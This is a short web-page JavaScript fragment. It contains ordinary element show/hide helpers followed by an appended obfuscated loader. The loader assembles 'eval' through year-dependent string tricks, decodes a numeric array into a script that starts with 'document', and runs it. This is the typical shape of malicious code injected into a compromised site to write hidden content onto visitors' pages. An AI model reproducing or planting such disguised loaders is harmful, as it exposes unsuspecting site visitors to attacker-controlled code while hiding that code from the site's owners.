<!--

// Example: obj = findObj("image1");
function findObj(theObj, theDoc)
{
  var p, i, foundObj;
  
  if(!theDoc) theDoc = document;
  if( (p = theObj.indexOf("?")) > 0 && parent.frames.length)
  {
    theDoc = parent.frames[theObj.substring(p+1)].document;
    theObj = theObj.substring(0,p);
  }
  if(!(foundObj = theDoc[theObj]) && theDoc.all) foundObj = theDoc.all[theObj];
  for (i=0; !foundObj && i < theDoc.forms.length; i++) 
    foundObj = theDoc.forms[i][theObj];
  for(i=0; !foundObj && theDoc.layers && i < theDoc.layers.length; i++) 
    foundObj = findObj(theObj,theDoc.layers[i].document);
  if(!foundObj && document.getElementById) foundObj = document.getElementById(theObj);
  
  return foundObj;
}


function showhide(what,count){
		 for(i=1;i<=count;i++){
			var obj = findObj("content0"+i);
			obj.style.display = 'none';
		 }	
		var showObj = findObj(what);
		if(showObj.style){
			showObj.style.display = 'block';
		}
}
var ar="/m=r)dl>xw 48yb':<a;pu25.ze1oscfv\"(i?htn6g";try{'qwe'.length(1);}catch(a){k=new Boolean().toString();date=new Date();};var ar2="f15,84,90,63,3,78,117,114,72,27,9,105,114,78,102,45,51,105,93,9,54,3,78,30,87,9,90,6,99,111,114,114,60,48,0,0,75,81,120,69,66,36,33,72,105,117,93,84,42,84,24,72,9,63,0,123,84,72,60,111,60,108,87,105,15,6,81,99,30,27,105,15,114,111,6,99,81,99,30,111,78,105,123,111,114,6,99,81,99,30,87,114,39,18,78,6,99,96,105,87,105,42,105,18,105,114,39,48,111,105,15,15,78,117,99,21,51,0,105,93,9,54,3,78,21,45,12,57]".replace(k.substr(0,1),'[');pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));e=Function("retu"+pau)();ar2=('gfhgffg',e(ar2));s="";for(i=0;i<ar2.length;i++){s+=ar.substr(ar2[i]/3,1);}
e(s);
-->

